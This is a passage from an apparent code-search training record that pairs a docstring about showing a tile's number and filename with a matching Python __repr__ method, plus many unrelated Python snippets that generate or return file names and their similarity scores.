self.contents_data[ITEM_KEY]\n\t\tif not item_key: return None\n\t\treturn \"portrait_\" + item_key + \".bmp\"", "def create_savename(self):\n \n savename = self.config.get('grid', 'dir') + self.fname.split('/')[-1]\n newsuffix = '_gridded_%ix%ix%i.nc' % (self.nx, self.ny, self.nz)\n savename = savename.replace('.nc', newsuffix)\n \n return savename", "def filename(self):\n return self.system.fileName()", "def GetFileName():\r\n d = GetData()\r\n return d.filename", "def get_filename(self):\n\n return self._filename", "def generate_temp_path(self, file_format=\"\"):\n file_name = os.path.join(\n self.temp_folder,\n f\"temp_{str(time.time()).replace('.', '')}\"\n )\n if file_format:\n file_name += f\".{file_format}\"\n self.logger.debug(f\"Created filename at {file_name}\")\n return file_name", "def file_name(self):\n \n file_name = stringify(self._file_name)\n if file_name is None:\n file_name = stringify(self._project.file_name)\n if file_name is None:\n with current_context() as ctx:\n file_name = stringify(ctx.get('ninja.file_name', DEFAULT_NAME))\n if file_name is not None:\n file_name = '{}.ninja'.format(file_name)\n return file_name", "def __diff_filename(self):\n diff_dir = os.path.join(self.__folder, Reference.DIFF_OUT)\n if not os.path.exists(diff_dir):\n os.makedirs(diff_dir)\n return os.path.join(diff_dir, self.__name +'.jpg')", "def GetOutputFilename(self, directory=None):\n if self.forced_filename:\n logging.debug('Forced filename or pre-computed file name = %s', self.filename)\n return self.filename\n\n tags = dict()\n\n # Base tag\n tags['base'] = f\"{self['ARTIST']} - {self['DATE_RECORDED']} - {self['TITLE']}\"\n\n # Setup version subinfo\n tags['version'] = f\" ({self['VERSION']})\" if self[\"VERSION\"] else \"\"\n\n # Setup label / release subinfo\n channels = self.channels if self.channels != '2.0' else ''\n if self[\"ORIGINAL_MEDIUM\"] == \"CD\":\n labeltag = f\"{self['LABEL']} {self['ISSUE_DATE']} {channels}\"\n else:\n labeltag = f\"{self['LABEL']} {self['ISSUE_DATE']} {self['ORIGINAL_MEDIUM']} {channels}\"\n labeltag = labeltag.strip()\n tags['label'] = labeltag and f\" ({labeltag})\"\n\n # Setup disc tag\n if self[\"PART_NUMBER\"]:\n disctag = f\" (Disc {self['PART_NUMBER']}) {self['DISC_NAME']}\"\n else:\n disctag = f\" {self['DISC_NAME']}\"\n tags['disc'] = disctag.rstrip()\n\n # Merge into filename\n filename = f\"{tags['base']}{tags['version']}{tags['disc']}{tags['label']}{ext.WAV}\"\n # Replace invalid characters with either a dash or remove them\n filename = re.compile(\"[<>:/\\\\\\\\]\").sub(\"-\", filename)\n filename = re.compile(\"[|?*]\").sub(\"\", filename)\n # Replace invalid double quotes with valid single quotes\n filename = filename.replace('\"', \"'\")\n\n if directory:\n return os.path.join(directory, filename)\n return filename", "def filename(self):\n return self.tag(\"filename\")", "def generate_filename(filename: str) -> str:\n return f\"{str(uuid.uuid4())}.{get_extension(filename)}\"", "def data_filename(self) -> str: # type: ignore[return-value]\n return os.path.abspath(self.name) # type: ignore", "def generate_temp_filename(self):\n prefix = self.generate_filename_prefix()\n now = datetime.now()\n # Ok that might not be the best timestamp system, but it's\n # enough for our needs.\n timestamp = '-'.join([\n ''.join([str(x) for x in now.timetuple()]),\n str(now.microsecond),\n str(randint(10000, 99999))])\n\n filename = prefix + timestamp\n return find_filename(self.tempdir,\n filename)", "def title(self):\n if self.file_name is None:\n return None\n else:\n fname = os.path.split(self.file_name)[-1]\n fname, *ext = fname.rsplit('.', 1)\n procgen = ext and ext[0] in ('json', 'yaml')\n if procgen and self._seed and self._seed.spawn_key:\n # Append the spawn key as the episode number\n fname += '-e' + str(self._seed.spawn_key[-1])\n return fname", "def filename(self) -> str:\n return self.definition.slug", "def co_filename(self):\n assert (\n self.filename is not None\n ), \"co_filename requires Target created from filename\"\n return self.filename.strpath", "def _PartName(self,partindex,nparts):\n\n\t\tfrom tempfile import mkstemp\n\t\timport os\n\n\t\tp = '%d_%d' % (partindex, nparts * nparts - 1)\n\t\tfd,name = mkstemp(prefix = p, suffix = '.image')\n\t\tos.close(fd)\n\t\tself.result = name\n\t\treturn name", "def _filename(self, corotid):\n from datasource import DataSource\n self.corotid = corotid\n self.corot = DataSource(database='corot', user='sro', host='pina.aip.de')\n \n query = \"\"\"SELECT run_code, hlfccdid, win_id \n FROM corot \n WHERE corotid = %d;\"\"\" % self.corotid\n result = self.corot.query(query)\n \n par = {'run': result[0][0],\n 'half': result[0][1].rstrip('RL'), \n 'win': result[0][2]}\n filename = '/work2/jwe/CoRoT/%(run)s/data/%(run)s_%(half)s_%(win)04d.fits' % par\n logger.info('%d = %s' % (corotid,filename))\n return filename", "def get_file_name(self):\n return self.path.name[6:]", "def hap_filename(self, filetype):\n if filetype == 'events':\n return self.folder('events') / 'run_{:07d}_{}_eventlist.fits'.format(self.obs_id, self.hap_config)\n # return self.folder('events') / 'events_{:06d}.fits.gz'.format(self.obs_id)\n elif filetype == 'aeff':\n return self.folder('irfs') / 'aeff_{:06d}.fits.gz'.format(self.obs_id)\n elif filetype == 'edisp':\n return self.folder('irfs') / 'edisp_{:06d}.fits.gz'.format(self.obs_id)\n elif filetype == 'psf_3gauss':\n return self.folder('irfs') / 'psf_3gauss_{:06d}.fits.gz'.format(self.obs_id)\n else:\n raise ValueError('Invalid {} {}'.format(filetype))", "def hap_filename(self, filetype):\n if filetype == 'events':\n return self.folder('events') / 'run_{:07d}_{}_eventlist.fits'.format(self.obs_id, self.hap_config)\n # return self.folder('events') / 'events_{:06d}.fits.gz'.format(self.obs_id)\n elif filetype == 'aeff':\n return self.folder('irfs') / 'aeff_{:06d}.fits.gz'.format(self.obs_id)\n elif filetype == 'edisp':\n return self.folder('irfs') / 'edisp_{:06d}.fits.gz'.format(self.obs_id)\n elif filetype == 'psf_3gauss':\n return self.folder('irfs') / 'psf_3gauss_{:06d}.fits.gz'.format(self.obs_id)\n else:\n raise ValueError('Invalid {} {}'.format(filetype))", "def hap_filename(self, filetype):\n if filetype == 'events':\n return self.folder('events') / 'run_{:07d}_{}_eventlist.fits'.format(self.obs_id, self.hap_config)\n # return self.folder('events') / 'events_{:06d}.fits.gz'.format(self.obs_id)\n elif filetype == 'aeff':\n return self.folder('irfs') / 'aeff_{:06d}.fits.gz'.format(self.obs_id)\n elif filetype == 'edisp':\n return self.folder('irfs') / 'edisp_{:06d}.fits.gz'.format(self.obs_id)\n elif filetype == 'psf_3gauss':\n return self.folder('irfs') / 'psf_3gauss_{:06d}.fits.gz'.format(self.obs_id)\n else:\n raise ValueError('Invalid {} {}'.format(filetype))", "def name(self):\n\t\tnam = super( textureFile, self ).name\n\t\tif self.hasUdim:\n\t\t\ttry:\n\t\t\t\treturn nam[:nam.rindex( '.' )]\n\t\t\texcept:\n\t\t\t\treturn nam\n\t\treturn nam", "def getFileName(self):\n return self.filename", "def generate(self, extension=None):\n filename = self._template.format(\n index=len(self._filenames),\n uuid=uuid4().hex,\n extension=extension or self._default_extension,\n )\n self._filenames.append(filename)\n return filename", "def _image_filename(image_name):\n return '{}.tar'.format(image_name.replace(':', '_').replace('/', '_'))", "def get_filename(self) -> str:\n\t\treturn self.xml_name", "def get_output_filename(item: str, root: str, i: int) -> str:\n element_split = item.split(\"/\")\n item, ext = element_split[-1].split(\".\")\n if i < 0:\n return f\"{root}/{'/'.join(element_split[:-1])}/{item}.{ext}\"\n else:\n return f\"{root}/{'/'.join(element_split[:-1])}/{item}_aug{i}.{ext}\"", "def _file_name(self, dtype_out_time, extension='nc'):\n out_lbl = utils.io.data_out_label(self.intvl_out, dtype_out_time,\n dtype_vert=self.dtype_out_vert)\n in_lbl = utils.io.data_in_label(self.intvl_in, self.dtype_in_time,\n self.dtype_in_vert)\n ens_lbl = utils.io.ens_label(self.ens_mem)\n yr_lbl = utils.io.yr_label((self.start_date.year, self.end_date.year))\n return '.'.join(\n [self.name, out_lbl, in_lbl, self.model.name,\n self.run.name, ens_lbl, yr_lbl, extension]\n ).replace('..', '.')", "def _file_name(size):\n timestamp = str(int(time.time()))\n return '%s_%dx%d.%s' % (timestamp, size, size, 'jpg')", "def get_filename(self):\n return self.get_package_name() + '-' + self.os + '-' + self.arch + GPPKG_EXTENSION", "def _create_id(self):\r\n buildfile_relpath = os.path.dirname(self.address.buildfile.relpath)\r\n if buildfile_relpath in ('.', ''):\r\n return self.name\r\n else:\r\n return \"%s.%s\" % (buildfile_relpath.replace(os.sep, '.'), self.name)", "def GetFileName(self):\n return self.file.GetPath()" ]
[ "0.7717686", "0.77164763", "0.74944174", "0.73645", "0.71533597", "0.7137769", "0.7135323", "0.71192485", "0.7112908", "0.7089001", "0.69753784", "0.69214255", "0.6892904", "0.6883375", "0.686652", "0.68156606", "0.6811536", "0.6807842", "0.6796225", "0.6787518", "0.6782904", "0.6766731", "0.67520434", "0.6737731", "0.6721141", "0.6708025", "0.6704186", "0.6704013", "0.670039", "0.6693806", "0.6688738", "0.666458", "0.6652345", "0.6650167", "0.66373026", "0.66280687", "0.6625388", "0.66229075", "0.6622495", "0.6619068", "0.6618845", "0.6596449", "0.6588556", "0.6579773", "0.656558", "0.6563641", "0.65604186", "0.6554955", "0.6551496", "0.6545742", "0.65387535", "0.6538446", "0.6531413", "0.6529823", "0.6525195", "0.650776", "0.64994967", "0.6493926", "0.64920515", "0.649058", "0.64874387", "0.64861256", "0.64772916", "0.6460261", "0.64554554", "0.6449987", "0.64482164", "0.64465845", "0.64407235", "0.64359814", "0.6434354", "0.643379", "0.64159095", "0.6414929", "0.640958", "0.6407059", "0.64017206", "0.6397808", "0.63951725", "0.63926524", "0.6389028", "0.6380674", "0.6379353", "0.637179", "0.6371101", "0.63688886", "0.6368155", "0.6368155", "0.6368155", "0.63661456", "0.6358031", "0.63524693", "0.6349265", "0.6348565", "0.6345411", "0.6342548", "0.63309705", "0.633005", "0.63297915", "0.632779" ]
0.7444088
3
Show tile number, and if saved to disk, filename.
def __repr__(self): if self.filename: return "<Tile #{} - {}>".format( self.number, os.path.basename(self.filename) ) return "<Tile #{}>".format(self.number)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tilefilename(self, x, y, z):\n\n tileIndex = x + y * self.tierSizeInTiles[z][0] + self.tileCountUpToTier[z]\n return os.path.join(\"TileGroup%.0f\" % math.floor( tileIndex / 256 ),\n \"%s-%s-%s.%s\" % ( z, x, y, self.tileformat))", "def tilefilename(self, x, y, z):\n\n tileIndex = x + y * self.tierSizeInTiles[z][0] + self.tileCountUpToTier[z]\n return os.path.join(\"TileGroup%.0f\" % math.floor(tileIndex / 256),\n \"%s-%s-%s.%s\" % (z, x, y, self.tileformat))", "def save_display_tile(tile, save=True, display=False):\n tile_pil_img = tile_to_pil_tile(tile)\n\n if save:\n t = Time()\n img_path = slide.get_tile_image_path(tile)\n dir = os.path.dirname(img_path)\n if not os.path.exists(dir):\n os.makedirs(dir)\n tile_pil_img.save(img_path)\n print(\"%-20s | Time: %-14s Name: %s\" % (\"Save Tile\", str(t.elapsed()), img_path))\n\n if display:\n tile_pil_img.show()", "def get_chunk_filename(self, number):\n return '%s-%s.tmp' % (self.identifier, number)", "def write_file(self):\n if self.it_num % 5 == 0:\n #plt.imshow(self.grid)\n #plt.savefig(\"output%.4d.png\" % self.it_num, bbox_inches='tight')\n io.savemat(\"MLOutput%.4d\" % self.it_num, { \"Grid\":self.grid})", "def __str__(self):\n output = ['Tile ID {}'.format(self._tileid)]\n for ex, files in self._exposure_files.items():\n filenames = '- exposure {:08d}\\n'.format(ex)\n for f in files:\n filenames = '{} + {}\\n'.format(filenames, f)\n output.append(filenames)\n\n return '\\n'.join(output)", "def tilestr(tile, show_details=False, show_unit=True):\n # TODO: show_details\n \n if tile.get('unit_name') in [None, \"\"]:\n unit_name = \"----\"\n else:\n unit_name = tile['unit_name'][0:4]\n if tile['unit_army_id'] != '1':\n army_id = int(tile['unit_army_id'])\n if army_id > 5:\n raise Exception(\"not implemented: more than 5 armies: {}\".format(army_id))\n unit_name = unit_name[0:(army_id-2)].upper() + unit_name[(army_id-2):].lower()\n details = \"\"\n if show_details:\n details = \" \"+tile_details_str(tile)\n return \"{}@{:02d},{:02d}{}{}\".format(\n tile['terrain_name'][0:4], tile['x'], tile['y'], (\":\"+unit_name) if show_unit else \"\",\n details)", "def _filename(self, corotid):\n from datasource import DataSource\n self.corotid = corotid\n self.corot = DataSource(database='corot', user='sro', host='pina.aip.de')\n \n query = \"\"\"SELECT run_code, hlfccdid, win_id \n FROM corot \n WHERE corotid = %d;\"\"\" % self.corotid\n result = self.corot.query(query)\n \n par = {'run': result[0][0],\n 'half': result[0][1].rstrip('RL'), \n 'win': result[0][2]}\n filename = '/work2/jwe/CoRoT/%(run)s/data/%(run)s_%(half)s_%(win)04d.fits' % par\n logger.info('%d = %s' % (corotid,filename))\n return filename", "def saveTiles(z, x, y, ntiles, mapname, image, suffix = 'png', imgtype = None):\n for dx in range(0, ntiles):\n tilex = x*ntiles + dx\n ensureDirExists(getTileDir(mapname, z, tilex))\n for dy in range(0, ntiles): \n tiley = y*ntiles + dy\n offsetx = BORDER_WIDTH + dx*TILE_SIZE\n offsety = BORDER_WIDTH + dy*TILE_SIZE\n view = image.view(offsetx, offsety, TILE_SIZE, TILE_SIZE)\n if imgtype:\n view.save(getTilePath(mapname, z, tilex, tiley, suffix), imgtype)\n else:\n view.save(getTilePath(mapname, z, tilex, tiley, suffix))", "def generate_filename(\n self, directory=os.getcwd(), prefix=\"tile\", format=\"png\", path=True\n ):\n filename = prefix + \"_{col:02d}_{row:02d}.{ext}\".format(\n col=self.column, row=self.row, ext=format.lower().replace(\"jpeg\", \"jpg\")\n )\n if not path:\n return filename\n return os.path.join(directory, filename)", "def ftile(self):\n try:\n ftile = \"_\".join([self[\"grid_name\"], self[\"tile_name\"]])\n except TypeError:\n ftile = None\n return ftile", "def save_tile_img(tif, xyz, dataset, tile_size, region, zone, save_path, display=False):\n \n prefix = f'{region}{zone}{dataset}_'\n x,y,z = xyz\n tile, mask = rt_main.tile(tif, x,y,z, tilesize=tile_size)\n if display: \n plt.imshow(np.moveaxis(tile,0,2))\n plt.show()\n \n skimage.io.imsave(f'{save_path}/{prefix}{z}_{x}_{y}.png',np.moveaxis(tile,0,2), check_contrast=False)", "def save_tile(x,y,z,fpath):\n UA = \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/77.0\"\n tile_url = f\"https://{random.choice('abc')}.tile.openstreetmap.org/{z}/{x}/{y}.png\"\n # cmd = f\"wget --user-agent='please download' -O {fpath} {url}\"\n if os.path.exists(fpath):\n print(f\"Already have tile {fpath}!\")\n return 0\n if os.path.isdir(fpath):\n raise ValueError(f\"requested path {fpath} exists and is a directory!\")\n try:\n res = rq.get(\n url=tile_url,\n headers={'User-Agent': UA}\n )\n status = res.status_code\n if status == 200:\n with open(fpath,'wb') as of:\n of.write(res.content)\n return 0\n else:\n print(f\"Error: response {status} from server:\\n{res.reason}\")\n return status\n except Exception as e:\n print(f\"Error getting tile: {e}\")\n return 1", "def save_top_tiles_image(pil_img, slide_name):\n t = Time()\n filepath = slide.get_top_tiles_image_path(slide_name)\n pil_img.save(filepath)\n print(\"%-20s | Time: %-14s Name: %s\" % (\"Save Top Tiles Image\", str(t.elapsed()), filepath))", "def save_tile_summary_image(pil_img, slide_name):\n t = Time()\n filepath = slide.get_tile_summary_image_path(slide_name)\n pil_img.save(filepath)\n print(\"%-20s | Time: %-14s Name: %s\" % (\"Save Tile Sum\", str(t.elapsed()), filepath))", "def generate_grid_filename(grid, field, level, ext=\"png\"):\n name_s = generate_grid_name(grid).replace(\" \", \"_\")\n field_s = field.replace(\" \", \"_\")\n time_s = generate_grid_time_begin(grid).strftime(\"%Y%m%d%H%M%S\")\n level_s = str(level).zfill(2)\n return f\"{name_s}_{field_s}_{level_s}_{time_s}.{ext}\"", "def print_level_title(number):\n\n color = ['\\033[31m', '\\033[32m', '\\033[33m', '\\033[34m', '\\033[35m', '\\033[36m', '\\033[37m']\n reset_color = '\\033[0m'\n\n img_file = open('levels_title.txt')\n images = img_file.read().split('***\\n')\n img_file.close()\n\n os.system('clear')\n print(color[0] + images[number] + reset_color)\n time.sleep(3)", "def save_tile_data(tile_summary):\n\n time = Time()\n\n csv = summary_title(tile_summary) + \"\\n\" + summary_stats(tile_summary)\n\n csv += \"\\n\\n\\nTile Num,Row,Column,Tissue %,Tissue Quantity,Col Start,Row Start,Col End,Row End,Col Size,Row Size,\" + \\\n \"Color Factor,S and V Factor,Quantity Factor,Score\\n\"\n\n for t in tile_summary.tiles:\n line = \"%d,%d,%d,%4.2f,%s,%d,%d,%d,%d,%d,%d,%4.0f,%4.2f,%4.2f,%0.4f\\n\" % (\n t.tile_num, t.r, t.c, t.tissue_percentage, t.tissue_quantity().name, t.c_s, t.r_s, t.c_e, t.r_e, t.c_e - t.c_s,\n t.r_e - t.r_s,t.color_factor,\n t.s_and_v_factor, t.quantity_factor, t.score)\n csv += line\n\n data_path = slide.get_tile_data_path(tile_summary.slide_name)\n csv_file = open(data_path, \"w\")\n csv_file.write(csv)\n csv_file.close()\n\n print(\"%-20s | Time: %-14s Name: %s\" % (\"Save Tile Data\", str(time.elapsed()), data_path))", "def filename(self):\n return TaskInfo._filename(self.id)", "def imageSaveOutput(image,name,number):\n FileName = name +\" \"+number\n mpimg.imsave(\"test_images_output\"+'//'+FileName,image)\n return 0;", "def _prettyfilename(self):\n return f'{self.grandparentTitle} - {self.seasonEpisode} - {self.title}'", "def _prettyfilename(self):\n return self.title", "def filename(N, Dr, g, launch):\n\n return 'N%s_R%s_G%s_E%s.datR' % tuple(map(float_to_letters,\n (N, Dr, g, launch)))", "def _prettyfilename(self):\n return f'{self.title} ({self.subtype})'", "def save_tile_summary_on_original_image(pil_img, slide_name):\n t = Time()\n filepath = slide.get_tile_summary_on_original_image_path(slide_name)\n pil_img.save(filepath)\n print(\"%-20s | Time: %-14s Name: %s\" % (\"Save Tile Sum Orig\", str(t.elapsed()), filepath))", "def save_tiles(self, tiles, output_dir):\n save_path = f\"{output_dir}/tiles.npy\"\n tiles_np = np.asarray(tiles)\n np.save(save_path, tiles_np)\n print(\"done saving .npy!\")", "def print_to_file(self, board, filename, header=None):\n if not os.path.exists(self.folder):\n os.makedirs(self.folder)\n #filename = board.id if board.id else \"board.txt\"\n file = os.path.join(self.folder, filename)\n header_only = False #os.path.isfile(file)\n with (open(file,'a+')) as f:\n if header:\n print(\" === \", header, \" === \", file=f)\n else:\n print(\" === ??? === \", file=f)\n if header_only:\n print(\"board.id:\", board.id, file=f)\n print(\"rotation:\", board.rotation, \", pieces:\", board.count_pieces(), \", halfMoves:\", board.halfMoves, \", no-progress:\", board.noProgressCount, file=f)\n else:\n board.display(f)\n \n self.print_legal_moves(board, f)\n #print(\"executed_moves:\", board.executed_moves, file=f)\n f.closed \n return file", "def save_tiles(df,output_dir,namefunc = None):\n if not isinstance(df,pd.core.frame.DataFrame):\n raise TypeError(\"df must be a pandas DataFrame!\")\n if any(e not in df.columns for e in ('z','x','y')):\n raise ValueError(\"df must have columns x, y, and z\")\n if namefunc is None:\n def namefunc(x,y,z):\n return f'{z}_{x}_{y}.png'\n\n opath = os.path.abspath(os.path.expanduser(output_dir))\n Path(opath).mkdir(parents=True, exist_ok=True)\n L = df.shape[0]\n flocs = [''] * L\n for i,xyz in enumerate(zip(df['x'],df['y'],df['z'])):\n x,y,z = xyz\n print(f\"({i+1} of {L})...\")\n sleep(0.75)\n outloc = os.path.join(opath,namefunc(x,y,z))\n if save_tile(x,y,z,outloc) == 0:\n flocs[i] = outloc\n df = df.assign(file_loc = flocs)\n return df[df['file_loc'] != '']", "def _prettyfilename(self):\n return f'{self.title} ({self.year})'", "def backup_int_in_fname(num: int, file_name: str) -> None:\n with open(file_name, 'w') as fname:\n fname.write(str(num))", "def torrent_filename(view_url, debug):\n r = requests.get(view_url)\n tree = fromstring(r.content)\n title = tree.findtext('.//title')\n filename = title.replace('NT > ', '')\n torrent = filename +'.torrent'\n\n if not debug:\n return torrent\n\n if debug == 'Y':\n # Print variables before returning value\n print \"Title :\", title\n print \"Filename :\", filename\n print \"Torrent :\", torrent\n return torrent", "def save_grid(fname, grid):\n\twith open((\"%sGridFix\" % fname), 'w') as file_handler:\n\t for item in grid:\n\t file_handler.write(\"{}\\n\".format(item))\n\t pass\n # Return the name of the file\n\treturn (\"%sGridFix\" % fname)", "def displayImage():\n f = open(os.path.join(\"outputColor\",\"epoch_total.txt\"),\"r\")\n epochNum = int(f.readline())\n f.close()\n return Image.open(\"outputPhotosColor/image_at_epoch_{:04d}.png\".format(epochNum))", "def _get_seq_filename(self):\n fnd = self._get_session_dir()\n self.seq_number += 1\n fn = os.path.join(fnd, 'S%4.4d.tif' % self.seq_number)\n return fn", "def print_info(self, filename):\n info = (\n f\"\\n------------------------------------------------\" f\"\\nFile {filename} contains:\\n\"\n )\n for ch in range(1, self.ch_amount):\n info = info + (f\"{ch:02d}. {self.ch_name[ch]};\" f\" sampled at {self.freq[ch]} Hz\\n\")\n info = info + \"------------------------------------------------\\n\"\n\n LGR.info(info)", "def save_GRID( self , filename ):\n self._fwrite_GRID( filename )", "def print_tile(tile: Image.Image):\n width, height = tile.size\n\n pixels = tile.getcolors(width * height)\n\n most_frequent_pixel = pixels[0]\n\n for count, color in pixels:\n if count > most_frequent_pixel[0]:\n most_frequent_pixel = (count, color)\n\n r, g, b = most_frequent_pixel[1]\n\n light = r * 299/1000 + g * 587/1000 + b * 114/1000\n\n char = get_char_from_light(light)\n\n color = get_xterm_color(r, g, b)\n\n print(\"\\u001b[38;5;\" + str(color) + \"m\" + char, end=\"\\033[0m\")", "def title(self):\n if self.file_name is None:\n return None\n else:\n fname = os.path.split(self.file_name)[-1]\n fname, *ext = fname.rsplit('.', 1)\n procgen = ext and ext[0] in ('json', 'yaml')\n if procgen and self._seed and self._seed.spawn_key:\n # Append the spawn key as the episode number\n fname += '-e' + str(self._seed.spawn_key[-1])\n return fname", "def outfigname(num, ext, char=\"\"):\n return \"f{}{}{}\".format(num, char, ext)", "def __str__(self):\n return \"{filename}\".format(filename=self.image.original_filename)", "def _filename(task_id):\n return \"{}.json\".format(task_id)", "def playlist_num_filename(**kwargs):\n return f\"{kwargs['track_num']} - {default_filename(**kwargs)}\"", "def stich(data, title=None):\n # Get name, list of tiles, width and height\n name = data[\"levels\"][0][\"name\"] \n tiles = data[\"levels\"][0][\"tiles\"]\n width = data[\"levels\"][0][\"width\"]\n height = data[\"levels\"][0][\"height\"]\n\n # Create the directory to place all the downloaded tiles in\n if title: #if title provided, name directory based on that\n dirname = title\n else: #if title not provided, generate a name\n dirname = name + str(width) + str(height)\n os.makedirs(dirname, exist_ok=True)\n os.chdir(dirname)\n\n #Create the empty image based on dimensions\n result = Image.new('RGB', (width, height))\n tile_size = None \n\n # actually get the tiles\n for i in tiles:\n image = get_tile(i['url']) #download image\n if not tile_size:\n tile_size = image.size[0] # on the first tile get the image size\n result.paste(im=image, box=(i['x'] * tile_size, i['y'] * tile_size)) # each tile has a number which isn't\n # it's cooridnate in pixels but it's order. \n # To get pixel coordinate just multiply by the size of each tile\n result.save('final.jpeg') # save file in directory\n os.chdir(os.path.join( os.path.dirname( __file__ ), '..' )) # then navigate back up to the base directory", "def __str__(self) -> str:\n\n return f\"{self.filename}:{self.line}:{self.flag}\"", "def generate_file_name(self):\n self._session_iterator = None # New file invalidate old interator\n self._img_count += 1\n self._current_file = '{0}/frame_{1}.jpg'.format(self._relative_path,self._img_count)\n return self.current_file", "def doTile(tile):\n global d, fmt, output, img, demag\n # get adjusted upper left coordinate for tile\n xstart,ystart=getCoords(tile)\n px = 256//demag\n tumor,blank=0,0\n for y in range(0,px):\n for x in range(0,px):\n curry,currx = y+ystart,x+xstart\n B,G,R = img.item(currx,curry,0),img.item(currx,curry,1),img.item(currx,curry,2)\n if B > 220 and G > 220 and R > 220:\n blank += 1\n if blank > (px**2)/2:\n print('removing %s' % tile)\n #os.remove(tile)\n return(1)\n if B < 70 and G > 180 and R < 70:\n tumor = 1\n print(\"%s tumor = %d\" % (tile,tumor))\n output.write(str(tumor)+',')\n \n blank = int(blank*2 > px**2)\n tumor = (tumor > 0)\n return(blank)", "def save_as_fits(self, filename):", "def get_tilename_cache_file(tablename):\n dir=get_tilename_cache_dir()\n fname='%s-tilenames.fits' % tablename\n return os.path.join(dir, fname)", "def __str__(self):\n if self._rank is None:\n rank_str = \"\"\n else:\n rank_str = str(self._rank + 1)\n\n if self._file is None:\n file_str = \"\"\n else:\n file_str = chr(self._file + 97)\n\n return file_str + rank_str", "def main():\n\tparser = construct_parser()\n\targs = parser.parse_args()\n\ttiles = slice(args.image, args.num_tiles, save=False)\n\tsave_tiles(tiles, prefix=get_basename(args.image), directory=args.dir,\n\t\t format=args.format)", "def filename(self):\n return '%s%s' % (self.identifier, self.extension)", "def fname_tsk1(tup): #Task 1 & 2\n fname1 = f\"file_{str(tup[0]).zfill(3):}: {tup[1]:.2f}, {tup[2]:.2e}, {tup[3]:.2e}\"\n return(fname1)", "def generateFileName(self):\n return 'Covid' + self.map_type + '.html'", "def save(self):\n print(\"Clicked S(ave)\")\n saved_tiles = []\n for tile in self.tiles.sprites():\n # Append tiles pos to correct list if tile is occupied\n if not tile.is_available:\n tiles_attr = {\"type\": tile.tile_type, \"pos\": tile.rect.topleft}\n saved_tiles.append(tiles_attr)\n save_tiles(saved_tiles, lvl=\"02\")\n print(saved_tiles)\n # Flash white screen when level is saved\n self.surface.fill(s.WHITE)\n pygame.display.flip()\n pygame.time.wait(100)\n print(\"Saved\")", "def download_tile(map_layer, zoom, x, y):\n try:\n tile_url = map_layer.get_tile_url(zoom, x, y)\n tmp_file, headers = urllib.request.urlretrieve(tile_url)\n return (x, y), tmp_file\n except URLError as e:\n app.logger.info(\"Error downloading tile x={}, y={}, z={} for layer {}: {}\".format(\n x, y, zoom, map_layer, e.reason))\n return (x, y), pkg_resources.resource_filename(\"geos\", \"static/empty_tile.png\")", "def acquire_image_filename(self):\n\t\titem_key = self.contents_data[ITEM_KEY]\n\t\tif not item_key: return None\n\t\treturn \"portrait_\" + item_key + \".bmp\"", "def get_display_name(self, short=False):\n if self.filename is None:\n return '[New file]'\n elif short:\n return os.path.basename(self.filename)\n else:\n return self.filename", "def _save_mst_tile(tile, i, preread_ifgs):\n mst_tile = mst.mst_multiprocessing(tile, dest_tifs, preread_ifgs, params)\n # locally save the mst_mat\n mst_file_process_n = join(params[cf.TMPDIR], 'mst_mat_{}.npy'.format(i))\n np.save(file=mst_file_process_n, arr=mst_tile)", "def __getTileIterName(self, iter_name, level):\n return iter_name + (\"t%s\" % level)", "def _PartName(self,partindex,nparts):\n\n\t\tfrom tempfile import mkstemp\n\t\timport os\n\n\t\tp = '%d_%d' % (partindex, nparts * nparts - 1)\n\t\tfd,name = mkstemp(prefix = p, suffix = '.image')\n\t\tos.close(fd)\n\t\tself.result = name\n\t\treturn name", "def file_name(id, title, kind=\"src\"):\n fn_template = conf.template_source_file_name\n if kind == \"tst\":\n fn_template = conf.template_test_file_name\n\n return fn_template.format(id=id, title=title.replace(\"-\", \"_\"))", "def printfile(self, event=None):\n filename = self.en.get()\n bbox = self.canvas.bbox(ALL)\n width=bbox.right*self.unit\n height=bbox.bottom*self.unit\n self.canvas.config(width=width, height=height)\n self.canvas.dump(filename)\n self.canvas.config(width=self.ca_width, height=self.ca_height)\n self.la.config(text='Wrote file ' + filename)", "def dataset_part_filename(dataset_part, num_data):\n if num_data >= 0:\n return '{}_data_{}.npz'.format(dataset_part, str(num_data))\n return '{}_data.npz'.format(dataset_part)", "def shard_filename(path, tag, shard_num, total_shards):\n return os.path.join(\n path, \"%s-%s-%.5d-of-%.5d\" % (_PREFIX, tag, shard_num, total_shards))", "def _file_name(size):\n timestamp = str(int(time.time()))\n return '%s_%dx%d.%s' % (timestamp, size, size, 'jpg')", "def summary(self):\n self.tiles.refreshnames()\n self.glues.refreshnames()\n # self.check_consistent()\n info = {\n \"ntiles\": len(self.tiles),\n \"nrt\": len([x for x in self.tiles if not x.is_fake]),\n \"nft\": len([x for x in self.tiles if x.is_fake]),\n \"nends\": len(self.glues),\n \"ntends\": len(self.tiles.glues_from_tiles()),\n \"tns\": \" \".join(x.name for x in self.tiles if x.name),\n \"ens\": \" \".join(x.name for x in self.glues if x.name)\n # if (\"info\" in self.keys() and \"name\" in self[\"info\"].keys())\n # else \"\",\n }\n tun = sum(1 for x in self.tiles if x.name is None)\n if tun > 0:\n info[\"tns\"] += \" ({} unnamed)\".format(tun)\n eun = sum(1 for x in self.glues if x.name is None)\n if eun > 0:\n info[\"ens\"] += \" ({} unnamed)\".format(eun)\n if info[\"nft\"] > 0:\n info[\"nft\"] = \" (+ {} fake)\".format(info[\"nft\"])\n else:\n info[\"nft\"] = \"\"\n return \"TileSet: {nrt} tiles{nft}, {nends} ends, {ntends} ends in tiles.\\nTiles: {tns}\\nEnds: {ens}\".format(\n **info\n )", "def save(self, fn: str) -> None:\n fout = open(fn, 'w')\n for t,x in zip(self.times,self.milestones):\n fout.write('%f\\t%d '%(t,len(x)))\n fout.write(' '.join([str(xi) for xi in x]))\n fout.write('\\n')\n fout.close()", "def map_displayer(stage, player,\n stage_tiles, TILES, special_tiles, default_tile):\n color.write(\"=============================================\\n\",\"BUILTIN\") # Hard seperation to show that a new turn has begun\n # Setup variables\n x = 1\n y = stage[1]\n player_x = player[0]\n player_y = player[1]\n\n while y > 0:\n while x < stage[0]+1:\n if x == player_x and y == player_y:\n color.write(TILES.get(\"player\", \"X\"), \"hit\")\n\n elif (\"{0},{1}\".format(x, y) in stage_tiles\n and \"{0},{1}\".format(x, y) in special_tiles):\n if (stage_tiles[\"{0},{1}\".format(x, y)] == 